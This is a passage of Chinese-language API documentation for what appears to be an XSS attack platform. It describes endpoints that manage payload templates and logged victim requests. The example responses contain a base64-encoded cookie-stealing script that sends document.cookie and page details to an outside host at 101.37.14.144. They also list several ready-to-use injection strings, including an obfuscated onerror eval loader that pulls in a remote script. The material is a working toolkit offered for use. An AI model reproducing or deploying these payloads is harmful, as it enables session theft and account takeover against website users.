  • 200:返回项目中js文件的详细信息,内容通过base64编码过,以及几个POC的利用语句
{
    "message": [{
        "headers": "eydDb250ZW50LUxlbmd0aCc6ICcnLCAnQ29udGVudC1UeXBlJzogJ3RleHQvcGxhaW4nLCAnSG9zdCc6ICcxMDEuMzcuMTQuMTQ0Ojg4ODgnLCAnVXNlci1BZ2VudCc6ICdNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xNV80KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvODcuMC40MjgwLjg4IFNhZmFyaS81MzcuMzYnLCAnQWNjZXB0JzogJyovKicsICdBY2NlcHQtRW5jb2RpbmcnOiAnZ3ppcCwgZGVmbGF0ZScsICdBY2NlcHQtTGFuZ3VhZ2UnOiAnemgtQ04semg7cT0wLjknLCAnQ29ubmVjdGlvbic6ICdjbG9zZSd9",
        "project_associated_file_name": "KE29b",
        "ip": "142.3.56.28",
        "full_url": "http://1127.0.0.1:8888/a/KE29b/",
        "creation_time": "1609233542",
        "request_method": "GET",
        "data_pack": "e30="
    }, {
        "headers": "eydDb250ZW50LUxlbmd0aCc6ICcnLCAnQ29udGVudC1UeXBlJzogJ3RleHQvcGxhaW4nLCAnSG9zdCc6ICcxMDEuMzcuMTQuMTQ0Ojg4ODgnLCAnVXNlci1BZ2VudCc6ICdNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xNV80KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvODcuMC40MjgwLjg4IFNhZmFyaS81MzcuMzYnLCAnQWNjZXB0JzogJ2ltYWdlL2F2aWYsaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLGltYWdlLyosKi8qO3E9MC44JywgJ0FjY2VwdC1FbmNvZGluZyc6ICdnemlwLCBkZWZsYXRlJywgJ0FjY2VwdC1MYW5ndWFnZSc6ICd6aC1DTix6aDtxPTAuOScsICdDb25uZWN0aW9uJzogJ2Nsb3NlJ30=",
        "project_associated_file_name": "KE29b",
        "ip": "142.3.56.28",
        "full_url": "http://127.0.0.1:8888/a/KE29b/?location=file%3A///Users/user/Desktop/test.html&toplocation=file%3A///Users/user/Desktop/test.html&cookie=&opener=&referrer=&title=",
        "creation_time": "1609233552",
        "request_method": "GET",
        "data_pack": "eydsb2NhdGlvbic6ICdmaWxlOi8vL1VzZXJzL3VzZXIvRGVza3RvcC90ZXN0Lmh0bWwnLCAndG9wbG9jYXRpb24nOiAnZmlsZTovLy9Vc2Vycy91c2VyL0Rlc2t0b3AvdGVzdC5odG1sJywgJ2Nvb2tpZSc6ICcnLCAnb3BlbmVyJzogJycsICdyZWZlcnJlcic6ICcnLCAndGl0bGUnOiAnJ30="
    }],
    "code": 200
}
  • 返回参数解释
    • project_associated_file_data项目文件完整内容,需要用base64解密
    • the_first_use第一个POC
    • the_second_use第二个POC
    • the_third_use第三个POC
    • exploit_path第四个POC
    • coding_exploit第五个POC
  • 403:嘿~宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
  • 404:你没有查询这个项目的权限哦宝贝~
  • 500:请使用Post请求

读取默认跨站脚本模板数据

/api/read_default_cross_site_script_template/用来跨站脚本中的默认数据有哪些

{
    "token": ""
}

参数解释

  • token登录后返回的token

返回状态码

  • 169:呐呐呐!莎酱被玩坏啦(>^ω^<)
  • 200:返回查询到的项目信息
{
    "message": {
        "project_associated_file_data": "dmFyIHggPSBuZXcgSW1hZ2UoKTsKdHJ5IHsKICAgIHZhciBteW9wZW5lciA9ICcnOwogICAgbXlvcGVuZXIgPSB3aW5kb3cub3BlbmVyICYmIHdpbmRvdy5vcGVuZXIubG9jYXRpb24gPyB3aW5kb3cub3BlbmVyLmxvY2F0aW9uOiAnJzsKfSBjYXRjaChlcnIpIHt9Cnguc3JjID0gJ2h0dHA6Ly8xMDEuMzcuMTQuMTQ0Ojg4ODgvYS9LRTI5Yi8/bG9jYXRpb249Jytlc2NhcGUoZG9jdW1lbnQubG9jYXRpb24pKycmdG9wbG9jYXRpb249Jytlc2NhcGUodG9wLmRvY3VtZW50LmxvY2F0aW9uKSsnJmNvb2tpZT0nK2VzY2FwZShkb2N1bWVudC5jb29raWUpKycmb3BlbmVyPScrZXNjYXBlKG15b3BlbmVyKSsnJnJlZmVycmVyPScrZXNjYXBlKGRvY3VtZW50LnJlZmVycmVyKSsnJnRpdGxlPScrZXNjYXBlKGRvY3VtZW50LnRpdGxlKTs=",
        "the_first_use": "</tExtArEa>'\"><sCRiPt sRC=//127.0.0.1:1234/s/KE29b></sCrIpT>",
        "the_second_use": "<sCRiPt/SrC=//127.0.0.1:1234/s/KE29b>",
        "the_third_use": "<img sRC=//127.0.0.1:1234/s/KE29b>",
        "exploit_path": "//127.0.0.1:1234/s/KE29b",
        "coding_exploit": "</tEXtArEa>'\"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22%2F%2F127.0.0.1:1234%2Fs%2FKE29b%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>"
    },
    "code": 200
}
  • 返回参数解释会有多个数组的集合
    • file_name文件名称
    • file_data文件数据,需要base64解密
  • 403:嘿~宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
  • 500:请使用Post请求

读取用户自定义跨站脚本模板数据

/api/read_cross_site_script_template/用来获取数据库中用户自定义的所有跨站脚本模板数据

{
    "token": ""
}

参数解释

  • token登录后返回的token

返回状态码

  • 169:呐呐呐!莎酱被玩坏啦(>^ω^<)
  • 200:返回查询到的项目信息
{
    "message": [{
        "file_name": "test.js",
        "file_data": "YWxlcnQoInhzcyIpOw=="
    }, {
        "file_name": "get_cookie.js",
        "file_data": "dmFyIHggPSBuZXcgSW1hZ2UoKTsKdHJ5IHsKICAgIHZhciBteW9wZW5lciA9ICcnOwogICAgbXlvcGVuZXIgPSB3aW5kb3cub3BlbmVyICYmIHdpbmRvdy5vcGVuZXIubG9jYXRpb24gPyB3aW5kb3cub3BlbmVyLmxvY2F0aW9uOiAnJzsKfSBjYXRjaChlcnIpIHt9Cnguc3JjID0gJ2h0dHA6Ly9pcC9hL+mhueebruaWh+S7tuWcsOWdgC8/bG9jYXRpb249Jytlc2NhcGUoZG9jdW1lbnQubG9jYXRpb24pKycmdG9wbG9jYXRpb249Jytlc2NhcGUodG9wLmRvY3VtZW50LmxvY2F0aW9uKSsnJmNvb2tpZT0nK2VzY2FwZShkb2N1bWVudC5jb29raWUpKycmb3BlbmVyPScrZXNjYXBlKG15b3BlbmVyKSsnJnJlZmVycmVyPScrZXNjYXBlKGRvY3VtZW50LnJlZmVycmVyKSsnJnRpdGxlPScrZXNjYXBlKGRvY3VtZW50LnRpdGxlKTs="
    }],
    "code": 200
}
  • 返回参数解释会有多个数组的集合
    • template_name模板名称
    • template_data模板数据,需要使用base64解密
    • creation_time模板创建时间
    • update_time模板更新时间
  • 403:嘿~宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
  • 500:请使用Post请求

保存用户自定义跨站脚本模板数据

/api/save_cross_site_script_template/用来生成用户自定义模板中的数据

{
    "token": "",
    "template_name":"",
    "template_data":""
}

参数解释

  • token登录后返回的token
  • template_name模板名
  • template_data模板数据

返回状态码

  • 200:模板写入成功
  • 403:嘿~宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
  • 169:呐呐呐!莎酱被玩坏啦(>^ω^<)
  • 500:请使用Post请求
  • 503:该模板已存在!

修改用户自定义跨站脚本模板数据

/api/modify_cross_site_script_template/用来修改用户自定义的模板数据

{
    "token": "",
    "template_name":"",
    "template_data":""
}

参数解释

  • token登录后返回的token
  • template_name模板名
  • template_data模板数据

返回状态码

  • 200:模板写入成功
  • 403:嘿~宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
  • 404:不存在该模板哦宝贝~
  • 169:呐呐呐!莎酱被玩坏啦(>^ω^<)
  • 500:请使用Post请求
  • 501:模板更新失败

Leave a Reply

您的电子邮箱地址不会被公开。 必填项已用 * 标注